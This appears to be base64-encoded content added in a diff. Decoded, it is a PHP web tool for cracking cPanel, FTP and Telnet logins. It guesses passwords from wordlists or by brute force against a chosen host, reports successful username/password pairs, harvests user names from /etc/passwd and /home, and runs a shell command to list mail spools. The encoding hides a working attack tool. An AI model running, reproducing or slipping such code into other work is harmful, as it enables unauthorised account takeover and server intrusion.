+ZmFjZT0iVGFob21hIj48Yj4gPC9iPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICA8L2ZvbnQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6IDEycHQ7IiBzaXplPSItMyIgZmFj
+ZT0iVmVyZGFuYSI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgIDxzcGFuIHN0eWxlPSJmb250LXNpemU6IDlwdDsiPjxmb250IGZhY2U9IlRhaG9tYSI+CgkJ
+CQkJCQkJCQkJCTxpbnB1dCBuYW1lPSJjcmFja3R5cGUiIHZhbHVlPSJjcGFuZWwyIiBzdHlsZT0i
+Zm9udC13ZWlnaHQ6IDcwMDsiIHR5cGU9InJhZGlvIj48L2ZvbnQ+PC9zcGFuPjwvZm9udD48Yj48
+Zm9udCBzaXplPSIyIiBmYWNlPSJUYWhvbWEiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICBUZWxuZXQ8L2ZvbnQ+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IiNj
+YzAwMDAiIGZhY2U9IlRhaG9tYSI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgIDwvZm9udD48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0i
+VGFob21hIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+KDIzKTwvZm9udD48L2I+PGZvbnQgc2l6ZT0iMiIgZmFjZT0iVGFob21hIj48Yj4gPC9iPgogICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+CiAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxmb250IHN0eWxlPSJm
+b250LXNpemU6IDEycHQ7IiBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSI+CiAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxzcGFuIHN0eWxlPSJmb250LXNpemU6
+IDlwdDsiPjxmb250IGZhY2U9IlRhaG9tYSI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJjcmFja3R5cGUiIHZhbHVlPSJmdHAiIHN0
+eWxlPSJmb250LXdlaWdodDogNzAwOyIgdHlwZT0icmFkaW8iPjwvZm9udD48L3NwYW4+PC9mb250
+Pjxmb250IHN0eWxlPSJmb250LXdlaWdodDogNzAwOyIgc2l6ZT0iMiIgZmFjZT0iVGFob21hIj4K
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9mb250Pjxz
+cGFuIHN0eWxlPSJmb250LXdlaWdodDogNzAwOyI+CiAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgIDxmb250IHNpemU9IjIiIGZhY2U9IlRhaG9tYSI+RnRwIDwv
+Zm9udD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZv
+bnQgc2l6ZT0iMiIgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlRhaG9tYSI+CiAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICgyMSk8L2ZvbnQ+PC9zcGFuPgoJCQkJ
+CQkJCQkJCQk8YnI+CgkJCQkJCQkJCQkJCTxmb250IHN0eWxlPSJmb250LXdlaWdodDo3MDAiIHNp
+emU9IjIiIGZhY2U9IlRhaG9tYSIgY29sb3I9IiMwMDgwMDAiPjxzcGFuIGxhbmc9ImFyLXNhIj5U
+aW1lb3V0IGRlbGF5PC9zcGFuPgoJCQkJCQkJCQkJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0i
+Y29ubmVjdF90aW1lb3V0IiBzdHlsZT0iYm9yZGVyOiAycHggc29saWQgIzFEMUQxRDtiYWNrZ3Jv
+dW5kOiBibGFjaztjb2xvcjpSRUQiIHNpemU9NDggdmFsdWU9Ijw/cGhwIGVjaG8gJGNvbm5lY3Rf
+dGltZW91dDs/PiI+PC9pbnB1dD4KCQkJCQkJCQkJCQkJPGJyPgoJCQkJCQkJCQkJCQk8aW5wdXQg
+dHlwZT0iY2hlY2tib3giIG5hbWU9ImJydXRlZm9yY2UiIHZhbHVlPSJ0cnVlIj48Zm9udCBzdHls
+ZT0iZm9udC13ZWlnaHQ6NzAwIiBzaXplPSIyIiBmYWNlPSJUYWhvbWEiIGNvbG9yPSIjMDA4MDAw
+Ij48c3BhbiBsYW5nPSJhci1zYSI+QnJ1dGVmb3JjZTwvc3Bhbj48L2lucHV0PgoJCQkJCQkJCQkJ
+CQk8c2VsZWN0IG5hbWU9ImNoYXJzZXQiIHN0eWxlPSJib3JkZXI6IDJweCBzb2xpZCAjMUQxRDFE
+O2JhY2tncm91bmQ6IGJsYWNrO2NvbG9yOlJFRCI+CgkJCQkJCQkJCQkJCSA8b3B0aW9uIHZhbHVl
+PSJhbGwiPkFsbCBMZXR0ZXJzICsgTnVtYmVyczwvb3B0aW9uPgogCQkJCQkJCQkJCQkgICAgIDxv
+cHRpb24gdmFsdWU9Im51bWVyaWMiPk51bWJlcnM8L29wdGlvbj4KCQkJCQkJCQkJCQkJIDxvcHRp
+b24gdmFsdWU9ImxldHRlcnMiPkxldHRlcnM8L29wdGlvbj4KCQkJCQkJCQkJCQkJIDxvcHRpb24g
+dmFsdWU9InN5bWJvbHMiPlN5bWJvbHM8L29wdGlvbj4KCQkJCQkJCQkJCQkJIDxvcHRpb24gdmFs
+dWU9Imxvd2VyY2FzZSI+TG93ZXIgTGV0dGVyczwvb3B0aW9uPgoJCQkJCQkJCQkJCQkgPG9wdGlv
+biB2YWx1ZT0idXBwZXJjYXNlIj5IaWdoZXIgTGV0dGVyczwvb3B0aW9uPgoJCQkJCQkJCQkJCQkg
+PG9wdGlvbiB2YWx1ZT0ibG93ZXJudW1lcmljIj5Mb3dlciBMZXR0ZXJzICsgTnVtYmVyczwvb3B0
+aW9uPgoJCQkJCQkJCQkJCQkgPG9wdGlvbiB2YWx1ZT0idXBwZXJudW1lcmljIj5VcHBlciBMZXR0
+ZXJzICsgTnVtYmVyczwvb3B0aW9uPgoJCQkJCQkJCQkJCQkgPG9wdGlvbiB2YWx1ZT0ibG93ZXJz
+eW1ib2xzIj5Mb3dlciBMZXR0ZXJzICsgU3ltYm9sczwvb3B0aW9uPgoJCQkJCQkJCQkJCQkgPG9w
+dGlvbiB2YWx1ZT0idXBwZXJzeW1ib2xzIj5VcHBlciBMZXR0ZXJzICsgU3ltYm9sczwvb3B0aW9u
+PgoJCQkJCQkJCQkJCQkgPG9wdGlvbiB2YWx1ZT0ibGV0dGVyc3N5bWJvbHMiPkFsbCBMZXR0ZXJz
+ICsgU3ltYm9sczwvb3B0aW9uPgoJCQkJCQkJCQkJCQkgPG9wdGlvbiB2YWx1ZT0ibnVtYmVyc3N5
+bWJvbHMiPk51bWJlcnMgKyBTeW1ib2xzPC9vcHRpb24+CgkJCQkJCQkJCQkJCSA8b3B0aW9uIHZh
+bHVlPSJsb3dlcm51bWVyaWNzeW1ib2xzIj5Mb3dlciBMZXR0ZXJzICsgTnVtYmVycyArIFN5bWJv
+bHM8L29wdGlvbj4KCQkJCQkJCQkJCQkJIDxvcHRpb24gdmFsdWU9InVwcGVybnVtZXJpY3N5bWJv
+bHMiPlVwcGVyIExldHRlcnMgKyBOdW1iZXJzICsgU3ltYm9sczwvb3B0aW9uPgoJCQkJCQkJCQkJ
+CQkgPG9wdGlvbiB2YWx1ZT0ibGV0dGVyc251bWVyaWNzeW1ib2xzIj5BbGwgTGV0dGVycyArIE51
+bWJlcnMgKyBTeW1ib2xzPC9vcHRpb24+CgoJCQkJCQkJCQkJCQk8L3NlbGVjdD4KCQkJCQkJCQkJ
+CQkJPGJyPgoJCQkJCQkJCQkJCQk8Zm9udCBzdHlsZT0iZm9udC13ZWlnaHQ6NzAwIiBzaXplPSIy
+IiBmYWNlPSJUYWhvbWEiIGNvbG9yPSIjMDA4MDAwIj48c3BhbiBsYW5nPSJhci1zYSI+TWluIEJy
+dXRlZm9yY2UgTGVuZ3RoOjwvc3Bhbj48L2ZvbnQ+CgkJCQkJCQkJCQkJCTxpbnB1dCB0eXBlPSJ0
+ZXh0IiBuYW1lPSJtaW5fbGVuZ3RoIiBzdHlsZT0iYm9yZGVyOiAycHggc29saWQgIzFEMUQxRDti
+YWNrZ3JvdW5kOiBibGFjaztjb2xvcjpSRUQiIHNpemU9NDggdmFsdWU9Ijw/cGhwIGVjaG8gJG1p
+bl9sZW5ndGg7Pz4iPjwvaW5wdXQ+CgkJCQkJCQkJCQkJCTxicj4KCQkJCQkJCQkJCQkJPGZvbnQg
+c3R5bGU9ImZvbnQtd2VpZ2h0OjcwMCIgc2l6ZT0iMiIgZmFjZT0iVGFob21hIiBjb2xvcj0iIzAw
+ODAwMCI+PHNwYW4gbGFuZz0iYXItc2EiPk1heCBCcnV0ZWZvcmNlIExlbmd0aDo8L3NwYW4+PC9m
+b250PgoJCQkJCQkJCQkJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ibWF4X2xlbmd0aCIgc3R5
+bGU9ImJvcmRlcjogMnB4IHNvbGlkICMxRDFEMUQ7YmFja2dyb3VuZDogYmxhY2s7Y29sb3I6UkVE
+IiBzaXplPTQ4IHZhbHVlPSI8P3BocCBlY2hvICRtYXhfbGVuZ3RoOz8+Ij48L2lucHV0PgoJCQkJ
+CQkJCQkJCQk8L3A+CiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7Jm5ic3A7Jm5ic3A7
+Jm5ic3A7CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIiBuYW1lPSJzdWJt
+aXQiIHN0eWxlPSJjb2xvcjogIzAwODAwMDsgZm9udC13ZWlnaHQ6IGJvbGQ7IGJvcmRlcjogMXB4
+IHNvbGlkICMzMzMzMzM7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDAiPjwvcD4KICAgICAgICAg
+ICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgPC90YWJs
+ZT4KCiAgICA8cCBhbGlnbj0iY2VudGVyIj48L3RkPgogIDwvdHI+CiAgPC9mb3JtPgoKPD9waHAK
+ZnVuY3Rpb24gYnJ1dGUoKQp7CglnbG9iYWwgJHZhbHMsJG1pbl9sZW5ndGgsJG1heF9sZW5ndGg7
+CglnbG9iYWwgJHRhcmdldCwkcHVyZXVzZXIsJGNvbm5lY3RfdGltZW91dDsKCSRtaW49JG1pbl9s
+ZW5ndGg7CgkkbWF4PSRtYXhfbGVuZ3RoOwoJJEEgPSBhcnJheSgpOwoJJG51bVZhbHMgPSBjb3Vu
+dCgkdmFscyk7CgkkaW5jRG9uZSA9ICIiOwoJJHJlYWxNYXggPSAiIjsKCSRjdXJyZW50VmFsID0g
+IiI7CgkkZmlyc3RWYWwgPSAiIjsKCWZvciAoJGkgPSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKysp
+IHsKCQkkQVskaV0gPSAtMTsKCX0KCQoJZm9yICgkaSA9IDA7ICRpIDwgJG1heDsgJGkrKykgewoJ
+CSRyZWFsTWF4ID0gJHJlYWxNYXggLiAkdmFsc1skbnVtVmFscyAtIDFdOwoJfQoJZm9yICgkaSA9
+IDA7ICRpIDwgJG1pbjsgJGkrKykgewoJCSRBWyRpXSA9ICR2YWxzWzBdOwoJfQoJJGkgPSAwOwoJ
+d2hpbGUgKCRBWyRpXSAhPSAtMSkgewoJCSRmaXJzdFZhbCAuPSAkQVskaV07CgkJJGkrKzsKCX0K
+CS8vZWNobyAkZmlyc3RWYWwgLiAiPGJyPiI7CgljcGFuZWxfY2hlY2soJHRhcmdldCwkcHVyZXVz
+ZXIsJGZpcnN0VmFsLCRjb25uZWN0X3RpbWVvdXQpOwoJCgl3aGlsZSAoMSkgewoJCWZvciAoJGkg
+PSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKyspIHsKCQkJaWYgKCRBWyRpXSA9PSAtMSkgewoJCQkJ
+YnJlYWs7CgkJCX0KCQl9CgkJJGktLTsKCQkkaW5jRG9uZSA9IDA7CgkJd2hpbGUgKCEkaW5jRG9u
+ZSkgewkKCQkJZm9yICgkaiA9IDA7ICRqIDwgJG51bVZhbHM7ICRqKyspIHsKCQkJCWlmICgkQVsk
+aV0gPT0gJHZhbHNbJGpdKSB7CgkJCQkJYnJlYWs7CgkJCQl9CgkJCX0KCQkJaWYgKCRqID09ICgk
+bnVtVmFscyAtIDEpKSB7CgkJCQkkQVskaV0gPSAkdmFsc1swXTsKCQkJCSRpLS07CgkJCQlpZiAo
+JGkgPCAwKSB7CgkJCQkJZm9yICgkaSA9IDA7ICRpIDwgKCRtYXggKyAxKTsgJGkrKykgewoJCQkJ
+CQlpZiAoJEFbJGldID09IC0xKSB7CgkJCQkJCQlicmVhazsKCQkJCQkJfQoJCQkJCX0KCQkJCQkk
+QVskaV0gPSAkdmFsc1swXTsKCQkJCQkkQVskaSArIDFdID0gLTE7CgkJCQkJJGluY0RvbmUgPSAx
+OwoJCQkJCXByaW50ICJTdGFydGluZyAiIC4gKHN0cmxlbigkY3VycmVudFZhbCkgKyAxKSAuICIg
+Q2hhcmFjdGVycyBDcmFja2luZzxicj4iOwoJCQkJfQoJCQl9IGVsc2UgewoJCQkJJEFbJGldID0g
+JHZhbHNbJGogKyAxXTsKCQkJCSRpbmNEb25lID0gMTsKCQkJfQoJCX0KCQkkaSA9IDA7CgkJJGN1
+cnJlbnRWYWwgPSAiIjsKCQl3aGlsZSAoJEFbJGldICE9IC0xKSB7CgkJCSRjdXJyZW50VmFsID0g
+JGN1cnJlbnRWYWwgLiAkQVskaV07CgkJCSRpKys7CgkJfQoJCWNwYW5lbF9jaGVjaygkdGFyZ2V0
+LCRwdXJldXNlciwkY3VycmVudFZhbCwkY29ubmVjdF90aW1lb3V0KTsKCQkvL2VjaG8gJGN1cnJl
+bnRWYWwgLiAiPGJyPiI7CgkJaWYgKCRjdXJyZW50VmFsID09ICRyZWFsTWF4KSB7CgkJCXJldHVy
+biAwOwoJCX0KCX0KfQpmdW5jdGlvbiBnZXRtaWNyb3RpbWUoKSB7CiAgIGxpc3QoJHVzZWMsICRz
+ZWMpID0gZXhwbG9kZSgiICIsbWljcm90aW1lKCkpOwogICByZXR1cm4gKChmbG9hdCkkdXNlYyAr
+IChmbG9hdCkkc2VjKTsKfSAKCmZ1bmN0aW9uIGZ0cF9jaGVjaygkaG9zdCwkdXNlciwkcGFzcywk
+dGltZW91dCkKewogJGNoID0gY3VybF9pbml0KCk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRf
+VVJMLCAiZnRwOi8vJGhvc3QiKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFO
+U0ZFUiwgMSk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSFRUUEFVVEgsIENVUkxBVVRIX0JB
+U0lDKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GVFBMSVNUT05MWSwgMSk7CiBjdXJsX3Nl
+dG9wdCgkY2gsIENVUkxPUFRfVVNFUlBXRCwgIiR1c2VyOiRwYXNzIik7CiBjdXJsX3NldG9wdCAo
+JGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAkdGltZW91dCk7CiBjdXJsX3NldG9wdCgkY2gs
+IENVUkxPUFRfRkFJTE9ORVJST1IsIDEpOwogJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKIGlmICgg
+Y3VybF9lcnJubygkY2gpID09IDI4ICkKIHsKIHByaW50ICI8Yj48Zm9udCBmYWNlPVwiVmVyZGFu
+YVwiIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIj4KIDxmb250IGNvbG9yPVwiI0FBMDAwMFwiPkVy
+cm9yIDo8L2ZvbnQ+IDxmb250IGNvbG9yPVwiIzAwODAwMFwiPkNvbm5lY3Rpb24gVGltZW91dAog
+UGxlYXNlIENoZWNrIFRoZSBUYXJnZXQgSG9zdG5hbWUgLjwvZm9udD48L2ZvbnQ+PC9iPjwvcD4i
+O2V4aXQ7CiB9CiBlbHNlIGlmICggY3VybF9lcnJubygkY2gpID09IDAgKQogewogIHByaW50ICI8
+Yj48Zm9udCBmYWNlPVwiVGFob21hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiIGNvbG9yPVwi
+IzAwODAwMFwiPlt+XTwvZm9udD48L2I+PGZvbnQgZmFjZT1cIlRhaG9tYVwiICAgc3R5bGU9XCJm
+b250LXNpemU6IDlwdFwiPjxiPjxmb250IGNvbG9yPVwiIzAwODAwMFwiPgogQ3JhY2tpbmcgU3Vj
+Y2VzcyBXaXRoIFVzZXJuYW1lICZxdW90OzwvZm9udD48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj4k
+dXNlcjwvZm9udD48Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj5cIgogYW5kIFBhc3N3b3JkIFwiPC9m
+b250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiRwYXNzPC9mb250Pjxmb250IGNvbG9yPVwiIzAw
+ODAwMFwiPlwiPC9mb250PjwvYj48YnI+PGJyPiI7CiB9CiBjdXJsX2Nsb3NlKCRjaCk7Cn0KZnVu
+Y3Rpb24gY3BhbmVsX2NoZWNrKCRob3N0LCR1c2VyLCRwYXNzLCR0aW1lb3V0KQp7CiBnbG9iYWwg
+JGNwYW5lbF9wb3J0OwogJGNoID0gY3VybF9pbml0KCk7CiAvL2VjaG8gImh0dHA6Ly8kaG9zdDoi
+LiRjcGFuZWxfcG9ydC4iICR1c2VyICRwYXNzPGJyPiI7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxP
+UFRfVVJMLCAiaHR0cDovLyRob3N0OiIgLiAkY3BhbmVsX3BvcnQpOwogY3VybF9zZXRvcHQoJGNo
+LCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9I
+VFRQQVVUSCwgQ1VSTEFVVEhfQkFTSUMpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQ
+V0QsICIkdXNlcjokcGFzcyIpOwogY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElN
+RU9VVCwgJHRpbWVvdXQpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAx
+KTsKICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiBpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCAp
+CiB7CiAgcHJpbnQgIjxiPjxmb250IGZhY2U9XCJWZXJkYW5hXCIgc3R5bGU9XCJmb250LXNpemU6
+IDlwdFwiPgogIDxmb250IGNvbG9yPVwiI0FBMDAwMFwiPkVycm9yIDo8L2ZvbnQ+IDxmb250IGNv
+bG9yPVwiIzAwODAwMFwiPkNvbm5lY3Rpb24gVGltZW91dAogIFBsZWFzZSBDaGVjayBUaGUgVGFy
+Z2V0IEhvc3RuYW1lIC48L2ZvbnQ+PC9mb250PjwvYj48L3A+IjtleGl0OwogfQogZWxzZSBpZiAo
+IGN1cmxfZXJybm8oJGNoKSA9PSAwICkKIHsKICBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlRhaG9t
+YVwiIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIiBjb2xvcj1cIiMwMDgwMDBcIj5bfl08L2ZvbnQ+
+PC9iPjxmb250IGZhY2U9XCJUYWhvbWFcIiAgIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIj48Yj48
+Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj4gCiAgQ3JhY2tpbmcgU3VjY2VzcyBXaXRoIFVzZXJuYW1l
+ICZxdW90OzwvZm9udD48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj4kdXNlcjwvZm9udD48Zm9udCBj
+b2xvcj1cIiMwMDgwMDBcIj5cIgogIGFuZCBQYXNzd29yZCBcIjwvZm9udD48Zm9udCBjb2xvcj1c
+IiNGRjAwMDBcIj4kcGFzczwvZm9udD48Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj5cIjwvZm9udD48
+L2I+PGJyPjxicj4iOwogfQogY3VybF9jbG9zZSgkY2gpOwp9CgokdGltZV9zdGFydCA9IGdldG1p
+Y3JvdGltZSgpOwoKaWYoaXNzZXQoJHN1Ym1pdCkgJiYgIWVtcHR5KCRzdWJtaXQpKQp7CiBpZihl
+bXB0eSgkdXNlcnMpICYmIGVtcHR5KCRwYXNzKSApCiB7CiAgIHByaW50ICI8cD48Zm9udCBmYWNl
+PVwiVGFob21hXCIgc2l6ZT1cIjJcIj48Yj48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj5FcnJvciA6
+IDwvZm9udD5QbGVhc2UgQ2hlY2sgVGhlIFVzZXJzIG9yIFBhc3N3b3JkIExpc3QgRW50cnkgLiAu
+IC48L2I+PC9mb250PjwvcD4iOyBleGl0OyB9CiBpZihlbXB0eSgkdXNlcnMpKXsgcHJpbnQgIjxw
+Pjxmb250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPkVy
+cm9yIDogPC9mb250PlBsZWFzZSBDaGVjayBUaGUgVXNlcnMgTGlzdCBFbnRyeSAuIC4gLjwvYj48
+L2ZvbnQ+PC9wPiI7IGV4aXQ7IH0KIGlmKGVtcHR5KCRwYXNzKSAmJiAkX1JFUVVFU1RbJ2JydXRl
+Zm9yY2UnXSE9InRydWUiICl7IHByaW50ICI8cD48Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzIn
+PjxiPjxmb250IGNvbG9yPScjRkYwMDAwJz5FcnJvciA6IDwvZm9udD5QbGVhc2UgQ2hlY2sgVGhl
+IFBhc3N3b3JkIExpc3QgRW50cnkgLiAuIC48L2I+PC9mb250PjwvcD4iOyBleGl0OyB9OwogJHVz
+ZXJsaXN0PWV4cGxvZGUoIlxuIiwkdXNlcnMpOwogJHBhc3NsaXN0PWV4cGxvZGUoIlxuIiwkcGFz
+cyk7CiBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHN0eWxlPVwiZm9udC1zaXplOiA5
+cHRcIiBjb2xvcj1cIiMwMDgwMDBcIj5bfl0jPC9mb250Pjxmb250IGZhY2U9XCJUYWhvbWFcIiBz
+dHlsZT1cImZvbnQtc2l6ZTogOXB0XCIgY29sb3I9XCIjRkYwMDAwXCI+CiBDcmFja2luZyBQcm9j
+ZXNzIFN0YXJ0ZWQsIFBsZWFzZSBXYWl0IC4uLjwvZm9udD48L2I+PGJyPjxicj4iOwoKIGlmKGlz
+c2V0KCRfUE9TVFsnY29ubmVjdF90aW1lb3V0J10pKQogewogICRjb25uZWN0X3RpbWVvdXQ9JF9Q
+T1NUWydjb25uZWN0X3RpbWVvdXQnXTsKIH0KCiBpZigkY3JhY2t0eXBlID09ICJmdHAiKQogewog
+IGZvcmVhY2ggKCR1c2VybGlzdCBhcyAkdXNlcikgCiAgewogICAkcHVyZXVzZXIgPSB0cmltKCR1
+c2VyKTsKICAgZm9yZWFjaCAoJHBhc3NsaXN0IGFzICRwYXNzd29yZCApIAogICB7CiAgICAgJHB1
+cmVwYXNzID0gdHJpbSgkcGFzc3dvcmQpOwogICAgIGZ0cF9jaGVjaygkdGFyZ2V0LCRwdXJldXNl
+ciwkcHVyZXBhc3MsJGNvbm5lY3RfdGltZW91dCk7CiAgIH0KICB9CiB9CiAKIGlmICgkY3JhY2t0
+eXBlID09ICJjcGFuZWwiIHx8ICRjcmFja3R5cGUgPT0gImNwYW5lbDIiKQogewogIGlmKCRjcmFj
+a3R5cGUgPT0gImNwYW5lbDIiKQogIHsKICAgJGNwYW5lbF9wb3J0PSIyMyI7CiAgfQogIGVsc2UK
+ICAgJGNwYW5lbF9wb3J0PSIyMDgyIjsKICAKICBmb3JlYWNoICgkdXNlcmxpc3QgYXMgJHVzZXIp
+IAogIHsKICAgJHB1cmV1c2VyID0gdHJpbSgkdXNlcik7CiAgIHByaW50ICI8Yj48Zm9udCBmYWNl
+PVwiVGFob21hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiIGNvbG9yPVwiIzAwODAwMFwiPlt+
+XSM8L2ZvbnQ+PGZvbnQgZmFjZT1cIlRhaG9tYVwiICBzdHlsZT1cImZvbnQtc2l6ZTogOXB0XCIg
+Y29sb3I9XCIjRkYwODAwXCI+CiAgIFByb2Nlc3NpbmcgdXNlciAkcHVyZXVzZXIgLi4uIDwvZm9u
+dD48L2I+IjsKICAgaWYoJF9QT1NUWydicnV0ZWZvcmNlJ109PSJ0cnVlIikKICAgewogICAgZWNo
+byAiIGJydXRlZm9yY2luZyAuLiI7CgllY2hvICI8YnI+IjsKCWJydXRlKCk7CiAgIH0KICAgZWxz
+ZQogICB7CgkgZWNobyAiPGJyPiI7IAoJIGZvcmVhY2ggKCRwYXNzbGlzdCBhcyAkcGFzc3dvcmQg
+KSAKICAgICB7CiAgICAgICAkcHVyZXBhc3MgPSB0cmltKCRwYXNzd29yZCk7CiAgICAgICBjcGFu
+ZWxfY2hlY2soJHRhcmdldCwkcHVyZXVzZXIsJHB1cmVwYXNzLCRjb25uZWN0X3RpbWVvdXQpOwog
+ICAgIH0KICAgfQogIH0KICAkdGltZV9lbmQgPSBnZXRtaWNyb3RpbWUoKTsKJHRpbWUgPSAkdGlt
+ZV9lbmQgLSAkdGltZV9zdGFydDsgCiBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHN0
+eWxlPVwiZm9udC1zaXplOiA5cHRcIiBjb2xvcj1cIiMwMDgwMDBcIj5bfl0jPC9mb250Pjxmb250
+IGZhY2U9XCJUYWhvbWFcIiBzdHlsZT1cImZvbnQtc2l6ZTogOXB0XCIgY29sb3I9XCIjRkYwMDAw
+XCI+CiBDcmFja2luZyBGaW5pc2hlZC4gRWxhcHNlZCB0aW1lOiAkdGltZTwvZm9udD4gc2Vjb25k
+czwvYj48YnI+PGJyPiI7CiAgfQp9CgoKCj8+Cgo8cCBhbGlnbj0iY2VudGVyIj48Yj48YSBocmVm
+PSJodHRwOi8vd3d3LmFsbTNyZWZoLmNvbS92YiI+CjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRp
+b246IG5vbmUiPlN1bm5pPC9zcGFuPjwvYT48L2I+PC9wPgoKICAgICAgPGZvcm0gc3R5bGU9ImJv
+cmRlcjogMHB4IHJpZGdlICNGRkZGRkYiPgoKCgoKICAgIDxwIGFsaWduPSJjZW50ZXIiPjwvdGQ+
+CiAgPC90cj48ZGl2IGFsaWduPSJjZW50ZXIiPgoKICAgICAgICAgICAgICAgIDx0cj4KCjwvZm9y
+bT4KCgo8ZGl2IGFsaWduPSJjZW50ZXIiPgogPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwJSIg
+Ym9yZGVyY29sb3JsaWdodD0iIzAwODAwMCIgYm9yZGVyY29sb3JkYXJrPSIjMDA2QTAwIiBoZWln
+aHQ9IjEwMCIgY2VsbHNwYWNpbmc9IjEiPgo8dHI+Cjx0ZCBib3JkZXJjb2xvcmxpZ2h0PSIjMDA4
+MDAwIiBib3JkZXJjb2xvcmRhcms9IiMwMDZBMDAiPgo8cCBhbGlnbj0ibGVmdCI+Cjx0ZXh0YXJl
+YSBzdHlsZT0iYm9yZGVyOiAycHggc29saWQgIzFEMUQxRDtiYWNrZ3JvdW5kOiAjMjAwMDAwO2Nv
+bG9yOiNDQ0ZGRkYiIG1ldGhvZD0nUE9TVCcgcm93cz0iMjUiIG5hbWU9IlMxIiBjb2xzPSIyMiI+
+CgoKPD9waHAKICAgaWYgKGlzc2V0KCRfR0VUWyd1c2VyJ10pKQogICAgICBzeXN0ZW0oJ2xzIC92
+YXIvbWFpbCcpOyAKICAgaWYgKGlzc2V0KCRfUE9TVFsnZ3JhYl91c2VyczEnXSkpIC8vZ3JhYiB1
+c2VycyBmcm9tIC9ldGMvcGFzc3dkCiAgIHsKCSAgJGxpbmVzPWZpbGUoIi9ldGMvcGFzc3dkIik7
+CgkgIGZvcmVhY2goJGxpbmVzIGFzICRucj0+JHZhbCkKCSAgewoJICAgJHN0cj1leHBsb2RlKCI6
+IiwkdmFsKTsKCSAgIGVjaG8gJHN0clswXS4iXG4iOwoJICB9CgkgCiAgIH0KICAgaWYgKGlzc2V0
+KCRfUE9TVFsnZ3JhYl91c2VyczInXSkpCiAgICB7CiAgICAgJGRpciA9ICIvaG9tZS8iOwogICAg
+IGlmICgkZGggPSBvcGVuZGlyKCRkaXIpKSB7CiAgICAgICAgd2hpbGUgKCgkZmlsZSA9IHJlYWRk
+aXIoJGRoKSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgIGVjaG8gJGZpbGUuICJcbiI7CiAgICAg
+ICAgfQoJCQljbG9zZWRpcigkZGgpOwoJCX0KCX0KPz4KPC90ZXh0YXJlYT4KPHRhYmxlPgo8dHI+
